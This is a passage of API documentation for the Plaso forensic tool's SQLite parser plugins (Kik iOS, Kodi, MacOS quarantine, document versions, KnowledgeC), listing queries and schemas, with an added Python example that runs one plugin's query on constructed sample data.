    message status, such as: read, unread, not sent, delivered, etc.
    Type: str
message_type
    message type, either Sent or Received.
    Type: str
offset
    identifier of the row from which the event data was extracted.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
username
    unique username of the sender or receiver.
    Type: str
DATA_TYPE = 'ios:kik:messaging'

class plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for iOS Kik messenger database files.
The iOS Kik messenger database file is typically stored in: kik.sqlite

DATA_FORMAT = 'iOS Kik messenger SQLite database (kik.sqlite) file'
NAME = 'kik_messenger'
ParseMessageRow(parser_mediator, query, row, **unused_kwargs)
    Parses a message row.
    Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
QUERIES = [('SELECT a.Z_PK AS id, b.ZUSERNAME, b.ZDISPLAYNAME,a.ZRECEIVEDTIMESTAMP, a.ZSTATE, a.ZTYPE, a.ZBODY FROM ZKIKMESSAGE a JOIN ZKIKUSER b ON b.ZEXTRA = a.ZUSER', 'ParseMessageRow')]
REQUIRED_STRUCTURE = {'ZKIKMESSAGE': frozenset({'ZBODY', 'ZRECEIVEDTIMESTAMP', 'ZSTATE', 'ZTYPE', 'ZUSER', 'Z_PK'}), 'ZKIKUSER': frozenset({'ZDISPLAYNAME', 'ZEXTRA', 'ZUSERNAME'})}


SCHEMAS = [{'Z_3MESSAGES': 'CREATE TABLE Z_3MESSAGES ( Z_3CHAT INTEGER, Z_5MESSAGES INTEGER, PRIMARY KEY (Z_3CHAT, Z_5MESSAGES) )', 'Z_6ADMINSINVERSE': 'CREATE TABLE Z_6ADMINSINVERSE ( Z_6ADMINS INTEGER, Z_6ADMINSINVERSE INTEGER, PRIMARY KEY (Z_6ADMINS, Z_6ADMINSINVERSE) )', 'Z_6BANSINVERSE': 'CREATE TABLE Z_6BANSINVERSE ( Z_6BANS INTEGER, Z_6BANSINVERSE INTEGER, PRIMARY KEY (Z_6BANS, Z_6BANSINVERSE) )', 'Z_6MEMBERS': 'CREATE TABLE Z_6MEMBERS ( Z_6MEMBERSINVERSE INTEGER, Z_6MEMBERS INTEGER, PRIMARY KEY (Z_6MEMBERSINVERSE, Z_6MEMBERS) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)', 'ZKIKATTACHMENT': 'CREATE TABLE ZKIKATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZRETRYCOUNT INTEGER, ZSTATE INTEGER, ZTYPE INTEGER, ZEXTRA INTEGER, ZMESSAGE INTEGER, ZLASTACCESSTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZCONTENT VARCHAR )', 'ZKIKATTACHMENTEXTRA': 'CREATE TABLE ZKIKATTACHMENTEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZATTACHMENT INTEGER, ZENCRYPTIONKEY BLOB )', 'ZKIKCHAT': 'CREATE TABLE ZKIKCHAT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZDRAFTMESSAGE INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZUSER INTEGER, ZDATEUPDATED TIMESTAMP )', 'ZKIKCHATEXTRA': 'CREATE TABLE ZKIKCHATEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHAT INTEGER, ZLASTSEENMESSAGE INTEGER, ZMUTEDTIMESTAMP TIMESTAMP )', 'ZKIKMESSAGE': 'CREATE TABLE ZKIKMESSAGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZSTATE INTEGER, ZSYSTEMSTATE INTEGER, ZTYPE INTEGER, ZCHATEXTRA INTEGER, ZDRAFTMESSAGECHAT INTEGER, ZLASTMESSAGECHAT INTEGER, ZLASTMESSAGEUSER INTEGER, ZUSER INTEGER, ZRECEIVEDTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZBODY VARCHAR, 
ZSTANZAID VARCHAR, ZRENDERINSTRUCTIONSET BLOB )', 'ZKIKUSER': 'CREATE TABLE ZKIKUSER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZADDRESSBOOKID INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZPRESENCE INTEGER, ZTYPE INTEGER, ZCHATUSER INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZDISPLAYNAME VARCHAR, ZDISPLAYNAMEASCII VARCHAR, ZEMAIL VARCHAR, ZFIRSTNAME VARCHAR, ZGROUPTAG VARCHAR, ZJID VARCHAR, ZLASTNAME VARCHAR, ZPPTIMESTAMP VARCHAR, ZPPURL VARCHAR, ZSTATUS VARCHAR, ZUSERNAME VARCHAR, ZCONTENTLINKSPROTODATA BLOB )', 'ZKIKUSEREXTRA': 'CREATE TABLE ZKIKUSEREXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZLOCALFLAGS INTEGER, ZUSER INTEGER, ZPUBLICMESSAGINGKEY BLOB )'}]

plaso.parsers.sqlite_plugins.kodi module

SQLite parser plugin for Kodi videos database files.

class plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Kodi videos database files.

The Kodi videos database file is typically stored in: MyVideos.db

DATA_FORMAT = 'Kodi videos SQLite database (MyVideos.db) file'

NAME = 'kodi'

ParseVideoRow(parser_mediator, query, row, **unused_kwargs)
Parses a Video row.

Parameters
    • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
    • query (str) – query that created the row.
    • row (sqlite3.Row) – row.

QUERIES = [('SELECT idFile, strFilename, playCount, lastPlayed FROM files', 'ParseVideoRow')]

REQUIRED_STRUCTURE = {'files': frozenset({'idFile', 'lastPlayed', 'playCount', 'strFilename'})}


SCHEMAS = [{'actor': 'CREATE TABLE actor ( actor_id INTEGER PRIMARY KEY, name TEXT, art_urls TEXT )', 'actor_link': 'CREATE TABLE actor_link(actor_id INTEGER, media_id INTEGER, media_type TEXT, role TEXT, cast_order INTEGER)', 'art': 'CREATE TABLE art(art_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, type TEXT, url TEXT)', 'bookmark': 'CREATE TABLE bookmark ( idBookmark integer primary key, idFile integer, timeInSeconds double, totalTimeInSeconds double, thumbNailImage text, player text, playerState text, type integer)', 'country': 'CREATE TABLE country ( country_id integer primary key, name TEXT)', 'country_link': 'CREATE TABLE country_link (country_id integer, media_id integer, media_type TEXT)', 'director_link': 'CREATE TABLE director_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)', 'episode': 'CREATE TABLE episode ( idEpisode integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 varchar(24),c13 varchar(24),c14 text,c15 text,c16 text,c17 varchar(24),c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idShow integer, userrating integer, idSeason integer)', 'files': 'CREATE TABLE files ( idFile integer primary key, idPath integer, strFilename text, playCount integer, lastPlayed text, dateAdded text)', 'genre': 'CREATE TABLE genre ( genre_id integer primary key, name TEXT)', 'genre_link': 'CREATE TABLE genre_link (genre_id integer, media_id integer, media_type TEXT)', 'movie': 'CREATE TABLE movie ( idMovie integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idSet integer, userrating integer, premiered text)', 'movielinktvshow': 'CREATE TABLE movielinktvshow ( idMovie integer, IdShow integer)', 'musicvideo': 'CREATE TABLE musicvideo ( idMVideo 
integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, userrating integer, premiered text)', 'path': 'CREATE TABLE path ( idPath integer primary key, strPath text, strContent text, strScraper text, strHash text, scanRecursive integer, useFolderNames bool, strSettings text, noUpdate bool, exclude bool, dateAdded text, idParentPath integer)', 'rating': 'CREATE TABLE rating (rating_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, rating_type TEXT, rating FLOAT, votes INTEGER)', 'seasons': 'CREATE TABLE seasons ( idSeason integer primary key, idShow integer, season integer, name text, userrating integer)', 'sets': 'CREATE TABLE sets ( idSet integer primary key, strSet text, strOverview text)', 'settings': 'CREATE TABLE settings ( idFile integer, Deinterlace bool,ViewMode integer,ZoomAmount float, PixelRatio float, VerticalShift float, AudioStream integer, SubtitleStream integer,SubtitleDelay float, SubtitlesOn bool, Brightness float, Contrast float, Gamma float,VolumeAmplification float, AudioDelay float, OutputToAllSpeakers bool, ResumeTime integer,Sharpness float, NoiseReduction float, NonLinStretch bool, PostProcess bool,ScalingMethod integer, DeinterlaceMode integer, StereoMode integer, StereoInvert bool, VideoStream integer)', 'stacktimes': 'CREATE TABLE stacktimes (idFile integer, times text)', 'streamdetails': 'CREATE TABLE streamdetails (idFile integer, iStreamType integer, strVideoCodec text, fVideoAspect float, iVideoWidth integer, iVideoHeight integer, strAudioCodec text, iAudioChannels integer, strAudioLanguage text, strSubtitleLanguage text, iVideoDuration integer, strStereoMode text, strVideoLanguage text)', 'studio': 'CREATE TABLE studio ( studio_id integer primary key, name TEXT)', 'studio_link': 'CREATE TABLE studio_link (studio_id integer, 
media_id integer, media_type TEXT)', 'tag': 'CREATE TABLE tag (tag_id integer primary key, name TEXT)', 'tag_link': 'CREATE TABLE tag_link (tag_id integer, media_id integer, media_type TEXT)', 'tvshow': 'CREATE TABLE tvshow ( idShow integer primary key,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, userrating integer, duration INTEGER)', 'tvshowlinkpath': 'CREATE TABLE tvshowlinkpath (idShow integer, idPath integer)', 'uniqueid': 'CREATE TABLE uniqueid (uniqueid_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, value TEXT, type TEXT)', 'version': 'CREATE TABLE version (idVersion integer, iCompressCount integer)', 'writer_link': 'CREATE TABLE writer_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)'}]

class plaso.parsers.sqlite_plugins.kodi.KodiVideoEventData
Bases: plaso.containers.events.EventData

Kodi video event data.

filename
    video filename.
    Type: str

play_count
    number of times the video has been played.
    Type: int

query
    SQL query that was used to obtain the event data.
    Type: str

DATA_TYPE = 'kodi:videos:viewing'

plaso.parsers.sqlite_plugins.ls_quarantine module

SQLite parser plugin for MacOS LS quarantine events database files.

class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventData
Bases: plaso.containers.events.EventData

MacOS launch services quarantine event data.

agent
    user agent that was used to download the file.
    Type: str

data
    data.
    Type: bytes

query
    SQL query that was used to obtain the event data.
    Type: str

url
    original URL of the file.
    Type: str

DATA_TYPE = 'macosx:lsquarantine'

class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS LS quarantine events database files.

The MacOS launch services (LS) quarantine database file is typically stored in: /Users//Library/Preferences/QuarantineEvents.com.apple.LaunchServices

DATA_FORMAT = 'MacOS launch services quarantine events database SQLite database file'

NAME = 'ls_quarantine'

ParseLSQuarantineRow(parser_mediator, query, row, **unused_kwargs)
Parses a launch services quarantine event row.

Parameters
    • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
    • query (str) – query that created the row.
    • row (sqlite3.Row) – row.

QUERIES = [('SELECT LSQuarantineTimeStamp AS Time, LSQuarantineAgentName AS Agent, LSQuarantineOriginURLString AS URL, LSQuarantineDataURLString AS Data FROM LSQuarantineEvent ORDER BY Time', 'ParseLSQuarantineRow')]

REQUIRED_STRUCTURE = {'LSQuarantineEvent': frozenset({'LSQuarantineAgentName', 'LSQuarantineDataURLString', 'LSQuarantineOriginURLString', 'LSQuarantineTimeStamp'})}

SCHEMAS = [{'LSQuarantineEvent': 'CREATE TABLE LSQuarantineEvent ( LSQuarantineEventIdentifier TEXT PRIMARY KEY NOT NULL, LSQuarantineTimeStamp REAL, LSQuarantineAgentBundleIdentifier TEXT, LSQuarantineAgentName TEXT, LSQuarantineDataURLString TEXT, LSQuarantineSenderName TEXT, LSQuarantineSenderAddress TEXT, LSQuarantineTypeNumber INTEGER, LSQuarantineOriginTitle TEXT, LSQuarantineOriginURLString TEXT, LSQuarantineOriginAlias BLOB )'}]

plaso.parsers.sqlite_plugins.mac_document_versions module

SQLite parser plugin for MacOS document revision database files.

class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventData
Bases: plaso.containers.events.EventData

MacOS document revision event data.

last_time
    the system user ID of the user that opened the file.
    Type: str

name
    name of the original file.
    Type: str

path
    path from the original file.
    Type: str

query
    SQL query that was used to obtain the event data.
    Type: str

user_sid
    identification user ID that opened the file.
    Type: str

version_path
    path to the version copy of the original file.
    Type: str

DATA_TYPE = 'mac:document_versions:file'

class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS document revision database files.

DATA_FORMAT = 'MacOS document revisions SQLite database file'

DocumentVersionsRow(parser_mediator, query, row, **unused_kwargs)
Parses a document versions row.

Parameters
    • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
    • query (str) – query that created the row.
    • row (sqlite3.Row) – row.

NAME = 'mac_document_versions'

QUERIES = [('SELECT f.file_name AS name, f.file_path AS path, f.file_last_seen AS last_time, g.generation_path AS version_path, g.generation_add_time AS version_time FROM files f, generations g WHERE f.file_storage_id = g.generation_storage_id;', 'DocumentVersionsRow')]

REQUIRED_STRUCTURE = {'files': frozenset({'file_last_seen', 'file_name', 'file_path', 'file_storage_id'}), 'generations': frozenset({'generation_add_time', 'generation_path', 'generation_storage_id'})}

ROOT_VERSION_PATH = '/.DocumentRevisions-V100/'

SCHEMAS = [{'files': 'CREATE TABLE files (file_row_id INTEGER PRIMARY KEY ASC, file_name TEXT, file_parent_id INTEGER, file_path TEXT, file_inode INTEGER, file_last_seen INTEGER NOT NULL DEFAULT 0, file_status INTEGER NOT NULL DEFAULT 1, file_storage_id INTEGER NOT NULL)', 'generations': 'CREATE TABLE generations (generation_id INTEGER PRIMARY KEY ASC, generation_storage_id INTEGER NOT NULL, generation_name TEXT NOT NULL, generation_client_id TEXT NOT NULL, generation_path TEXT UNIQUE, generation_options INTEGER NOT NULL DEFAULT 1, generation_status INTEGER NOT NULL DEFAULT 1, generation_add_time INTEGER NOT NULL DEFAULT 0, generation_size INTEGER NOT NULL DEFAULT 0, generation_prunable INTEGER NOT NULL DEFAULT 0)', 'storage': 'CREATE TABLE storage (storage_id INTEGER PRIMARY KEY ASC AUTOINCREMENT, storage_options INTEGER NOT NULL DEFAULT 1, storage_status INTEGER NOT NULL DEFAULT 1)'}]
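The plugin entries on this page (kodi, ls_quarantine and mac_document_versions alike) follow one SQLitePlugin contract: SCHEMAS records the table definitions a supported database is expected to carry, REQUIRED_STRUCTURE names the tables and columns the queries depend on, and each QUERIES entry pairs a query with the method that turns its rows into events. The following stand-alone Python is an added example, not Plaso code, that walks that contract with the MacDocumentVersionsPlugin values above: it builds an in-memory database from the files and generations schemas (the storage table, which the query does not touch, is left out), applies the REQUIRED_STRUCTURE check, and runs the plugin's query over constructed sample rows. Prefixing ROOT_VERSION_PATH to the stored generation_path is this example's assumption about how the absolute version path is formed; the file and generation rows are constructed.

```python
import sqlite3

# Values copied from the MacDocumentVersionsPlugin entry on this page
# (the storage table, which the query does not touch, is left out).
ROOT_VERSION_PATH = '/.DocumentRevisions-V100/'

QUERY = (
    'SELECT f.file_name AS name, f.file_path AS path, '
    'f.file_last_seen AS last_time, g.generation_path AS version_path, '
    'g.generation_add_time AS version_time FROM files f, generations g '
    'WHERE f.file_storage_id = g.generation_storage_id;')

REQUIRED_STRUCTURE = {
    'files': frozenset({
        'file_last_seen', 'file_name', 'file_path', 'file_storage_id'}),
    'generations': frozenset({
        'generation_add_time', 'generation_path', 'generation_storage_id'}),
}

SCHEMA = {
    'files': (
        'CREATE TABLE files (file_row_id INTEGER PRIMARY KEY ASC, '
        'file_name TEXT, file_parent_id INTEGER, file_path TEXT, '
        'file_inode INTEGER, file_last_seen INTEGER NOT NULL DEFAULT 0, '
        'file_status INTEGER NOT NULL DEFAULT 1, '
        'file_storage_id INTEGER NOT NULL)'),
    'generations': (
        'CREATE TABLE generations (generation_id INTEGER PRIMARY KEY ASC, '
        'generation_storage_id INTEGER NOT NULL, '
        'generation_name TEXT NOT NULL, generation_client_id TEXT NOT NULL, '
        'generation_path TEXT UNIQUE, '
        'generation_options INTEGER NOT NULL DEFAULT 1, '
        'generation_status INTEGER NOT NULL DEFAULT 1, '
        'generation_add_time INTEGER NOT NULL DEFAULT 0, '
        'generation_size INTEGER NOT NULL DEFAULT 0, '
        'generation_prunable INTEGER NOT NULL DEFAULT 0)'),
}

# Constructed sample rows, not taken from a real system.
SAMPLE_FILES = [
    ('report.docx', '/Users/analyst/Documents/report.docx', 1400000000, 7),
]
SAMPLE_GENERATIONS = [
    (7, 'gen-1', 'com.apple.TextEdit',
     'PerUID/501/7/com.apple.documentVersions/0A1B.docx', 1400000100),
    (7, 'gen-2', 'com.apple.TextEdit',
     'PerUID/501/7/com.apple.documentVersions/0A2C.docx', 1400000200),
]


def make_database(schema, files=(), generations=()):
    """Build an in-memory SQLite database from CREATE statements and rows."""
    connection = sqlite3.connect(':memory:')
    connection.row_factory = sqlite3.Row
    for create_statement in schema.values():
        connection.execute(create_statement)
    if files:
        connection.executemany(
            'INSERT INTO files (file_name, file_path, file_last_seen, '
            'file_storage_id) VALUES (?, ?, ?, ?)', files)
    if generations:
        connection.executemany(
            'INSERT INTO generations (generation_storage_id, generation_name, '
            'generation_client_id, generation_path, generation_add_time) '
            'VALUES (?, ?, ?, ?, ?)', generations)
    connection.commit()
    return connection


def table_columns(connection, table_name):
    """Column names of a table via PRAGMA table_info; empty set if absent."""
    # PRAGMA takes no bound parameters; the name comes from the plugin
    # definition, not the evidence file, and is quoted as an identifier.
    quoted = '"{0:s}"'.format(table_name.replace('"', '""'))
    rows = connection.execute('PRAGMA table_info({0:s})'.format(quoted))
    return {row['name'] for row in rows}


def structure_matches(connection, required_structure=REQUIRED_STRUCTURE):
    """True when every required table exists with every required column
    (the check REQUIRED_STRUCTURE expresses; this is the example's version)."""
    return all(
        columns <= table_columns(connection, table_name)
        for table_name, columns in required_structure.items())


def extract_events(connection):
    """Run QUERY and return one dict per row, or [] if the structure differs.
    Prefixing ROOT_VERSION_PATH to generation_path is this example's assumption."""
    if not structure_matches(connection):
        return []
    return [{
        'name': row['name'],
        'path': row['path'],
        'last_time': row['last_time'],
        'version_path': ROOT_VERSION_PATH + row['version_path'],
        'version_time': row['version_time'],
    } for row in connection.execute(QUERY)]
```

Calling `extract_events(make_database(SCHEMA, SAMPLE_FILES, SAMPLE_GENERATIONS))` yields one event per generation row joined to its file. A database whose files table lacks file_storage_id (an older or foreign layout) fails structure_matches and produces no events instead of a query error, which is the behaviour REQUIRED_STRUCTURE buys a plugin before it ever runs a query against an unfamiliar file.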

plaso.parsers.sqlite_plugins.mac_knowledgec module

SQLite parser plugin for MacOS Duet/KnowledgeC database files.

class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData
Bases: plaso.containers.events.EventData

KnowledgeC application execution event data.

bundle_identifier
    bundle identifier of the application.
    Type: str

duration
    duration of the activity.
    Type: int

DATA_TYPE = 'mac:knowledgec:application'

class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS Duet/KnowledgeC database files.

DATA_FORMAT = 'MacOS Duet / KnowledgeC SQLites database file'

KnowledgeCRow(parser_mediator, query, row, **unused_kwargs)
Parses KnowledgeC application activity.

Parameters
    • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
    • query (str) – query that created the row.
    • row (sqlite3.Row) – row.

NAME = 'mac_knowledgec'

QUERIES = [('\n SELECT\n ZOBJECT.ZCREATIONDATE AS "entry_creation", \n ZOBJECT.ZSTARTDATE AS "start", \n ZOBJECT.ZENDDATE AS "end",\n ZOBJECT.ZSTREAMNAME AS "action",\n ZOBJECT.ZVALUESTRING AS "zvaluestring",\n ZSTRUCTUREDMETADATA.Z_DKSAFARIHISTORYMETADATAKEY__TITLE AS "title"\n FROM ZOBJECT\n LEFT JOIN ZSTRUCTUREDMETADATA \n ON ZOBJECT.ZSTRUCTUREDMETADATA = ZSTRUCTUREDMETADATA.Z_PK\n ', 'KnowledgeCRow')]

REQUIRED_STRUCTURE = {'ZOBJECT': frozenset({'ZCREATIONDATE', 'ZENDDATE', 'ZSTARTDATE', 'ZSTREAMNAME', 'ZVALUESTRING'}), 'ZSTRUCTUREDMETADATA': frozenset({'Z_DKSAFARIHISTORYMETADATAKEY__TITLE'})}


SCHEMAS = [{'ACHANGE': 'CREATE TABLE ACHANGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHANGETYPE INTEGER, ZENTITY INTEGER, ZENTITYPK INTEGER, ZTRANSACTIONID INTEGER, ZCOLUMNS BLOB, ZTOMBSTONE0 BLOB, ZTOMBSTONE1 BLOB, ZTOMBSTONE2 BLOB )', 'ATRANSACTION': 'CREATE TABLE ATRANSACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZTIMESTAMP FLOAT, ZAUTHOR VARCHAR, ZBUNDLEID VARCHAR, ZCONTEXTNAME VARCHAR, ZPROCESSID VARCHAR, ZQUERYGEN BLOB )', 'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, 
ZSTARTDATE TIMESTAMP, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCOUNT INTEGER, ZINTEGERVALUE INTEGER, ZHISTOGRAM INTEGER, ZSTRINGVALUE VARCHAR )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z8_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZSUBJECT INTEGER, Z8_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, 
Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, Z_DKSUNRISESUNSETMETADATAKEY__ISDAYLIGHT INTEGER, Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION 